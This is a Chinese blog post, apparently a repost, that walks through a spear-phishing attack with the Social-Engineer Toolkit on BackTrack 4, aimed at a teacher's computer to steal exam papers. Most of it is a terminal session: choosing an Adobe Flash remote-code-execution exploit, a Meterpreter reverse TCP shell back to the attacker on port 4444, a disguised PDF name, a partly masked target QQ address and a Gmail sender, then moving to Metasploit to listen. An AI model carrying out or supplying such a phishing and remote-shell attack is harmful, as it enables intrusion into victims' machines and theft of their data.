文章来自Nuclear 博客
http://backtrack.it/ 这个国外网站有视频演示过了的。
要期末开始了,虽然控制了整个学校的网络啥的,但是还是没弄到期末考试试题!于是就想通过邮箱来干掉老师的电脑然后窃取期末试题(玩笑话啊,不要当真),开始上菜。
MY Computer IP:
192.168.56.137 //Backtrack 4
We Need:
#1 gmail
#2 target mail ad
login as: root
root@192.168.56.137s password:
BackTrack 4 R2 (CodeName Nemesis) Security Auditing
For more information visit: http://www.backtrack-linux.org/
Last login: Wed Dec 29 00:09:34 2010 from 192.168.56.139
root@bt:~# clear
root@bt:~# cd /pentest/exploits/SET/ //转到SET工具目录啦
root@bt:/pentest/exploits/SET# ./set //运行这个工具
_______________________________
/ _____/\_ _____/\__ ___/
\_____ | __)_ | |
/ | | |
/_______ //_______ / |____|
/ /
[---] The Social-Engineer Toolkit (SET) [---]
[---] Written by David Kennedy (ReL1K) [---]
[---] Version: 1.0 [---]
[---] Codename: Devolution [---]
[---] Report bugs to: davek@social-engineer.org [---]
[---] Follow Me On Twitter: dave_rel1k [---]
[---] Java Applet Written by: Thomas Werth [---]
[---] Homepage: http://www.secmaniac.com [---]
[---] Framework: http://www.social-engineer.org [---]
[---] Over 1.4 million downloads and counting. [---]
Welcome to the Social-Engineer Toolkit (SET). Your one
stop shop for all of your social-engineering needs..
DerbyCon 2011 Sep30-Oct02 - http://www.derbycon.com
Select from the menu: //菜单。我们要选择的1
1. Spear-Phishing Attack Vectors
2. Website Attack Vectors
3. Infectious Media Generator
4. Create a Payload and Listener
5. Mass Mailer Attack
6. Teensy USB HID Attack Vector
7. SMS Spoofing Attack Vector
8 Update the Metasploit Framework
9. Update the Social-Engineer Toolkit
10. Help, Credits, and About
11. Exit the Social-Engineer Toolkit
Enter your choice: 1 //输入选择1
Welcome to the SET E-Mail attack method. This module allows you
to specially craft email messages and send them to a large (or small)
number of people with attached fileformat malicious payloads. If you
want to spoof your email address, be sure "Sendmail" is installed (it
is installed in BT4) and change the config/set_config SENDMAIL=OFF flag
to SENDMAIL=ON.
There are two options, one is getting your feet wet and letting SET do
everything for you (option 1), the second is to create your own FileFormat
payload and use it in your own attack. Either way, good luck and enjoy!
1. Perform a Mass Email Attack
2. Create a FileFormat Payload
3. Create a Social-Engineering Template
4. Return to Main Menu
Enter your choice: 1 //再次选择1
Select the file format exploit you want.
The default is the PDF embedded EXE.
********** PAYLOADS ********** //这里是漏洞模块。很重要哦。我知道我们老师用Flash Player所以我选择2.发送Flash Player漏洞文件过去
1. SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
2. Adobe Flash Player Button Remote Code Execution
3. Adobe CoolType SING Table uniqueName Overflow
4. Adobe Flash Player newfunction Invalid Pointer Use
5. Adobe Collab.collectEmailInfo Buffer Overflow
6. Adobe Collab.getIcon Buffer Overflow
7. Adobe JBIG2Decode Memory Corruption Exploit
8. Adobe PDF Embedded EXE Social Engineering
9. Adobe util.printf() Buffer Overflow
10. Custom EXE to VBA (sent via RAR) (RAR required)
11. Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
12. Adobe PDF Embedded EXE Social Engineering (NOJS)
Enter the number you want (press enter for default): 2 //就是选择上面那个东东的
1. Windows Reverse TCP Shell Spawn a command shell on victim and send back to attacker.
2. Windows Meterpreter Reverse_TCP Spawn a meterpreter shell on victim and send back to attacker.
3. Windows Reverse VNC DLL Spawn a VNC server on victim and send back to attacker.
4. Windows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse TCP Inline
5. Windows Meterpreter Reverse_TCP (X64) Connect back to the attacker (Windows x64), Meterpreter
6. Windows Shell Bind_TCP (X64) Execute payload and create an accepting port on remote system.
7. Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter
Enter the payload you want (press enter for default): 2 //这是是选择反弹回来的方式。第二个吧 我们要用metasploit的
Enter the port to connect back on (press enter for default): 4444 //反弹回来的端口 可以写其他的
Generating fileformat exploit...
Payload creation complete.
All payloads get sent to the src/program_junk/template.pdf directory
As an added bonus, use the file-format creator in SET to create your attachment.
Right now the attachment will be imported with filename of template.whatever
Do you want to rename the file?
example Enter the new filename: moo.pdf
1. Keep the filename, I dont care.
2. Rename the file, I want to be cool.
Enter your choice (enter for default): 2 //这里生存的漏洞文件默认叫做moo.pdf 我需要一个更酷的名字 所以就选择2
Enter the new filename: helloworld.pdf //我想到的很酷的名字
Filename changed, moving on...
Social Engineer Toolkit Mass E-Mailer
There are two options on the mass e-mailer, the first would
be to send an email to one individual person. The second option
will allow you to import a list and send it to as many people as
you want within that list.
What do you want to do: //选择工作方式
1. E-Mail Attack Single Email Address
2. E-Mail Attack Mass Mailer
3. Return to main menu.
Enter your choice: 1 //单一发送啦。就选择1吧
Do you want to use a predefined template or craft
a one time email template.
1. Pre-Defined Template
2. One-Time Use Email Template
Enter your choice: 1 //在来一次1
Below is a list of available templates:
1: New Update
2: Computer Issue
3: Strange internet usage from your computer
4: LOL...have to check this out...
5: Status Report
6: Baby Pics
7: Dan Browns Angels & Demons
Enter the number you want to use: 1 //这里是说用以前的还是新的。我要新的就选择1
Enter who you want to send email to: 15699*****@qq.com //要日掉的目标账号啦
What option do you want to use?
1. Use a GMAIL Account for your email attack.
2. Use your own server or open relay
Enter your choice: 1 //这里是选择你发信的邮箱
Enter your GMAIL email address: xi7o***@gmail.com //输入我的邮箱
Enter your password for gmail (it will not be displayed back to you): //输入我的邮箱密码 //这里密码是不可见的
Do you want to setup a listener yes or no: no //是否监听。我现在不要,因为我要用metasploit来监听
//搞定上面的邮件就已经发送出去了。你可以先测试一下。下面退出这个set程序 你可以用ctrl+c
root@bt:/pentest/exploits/SET# cd .. 返回上一层目录
root@bt:/pentest/exploits# cd framework3/ //跑到metsploit 目录
root@bt:/pentest/exploits/framework3# ls
HACKING external msfconsole msfgui msfpescan plugins tools
README lib msfd msfmachscan msfrpc prof
扫一扫
608
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
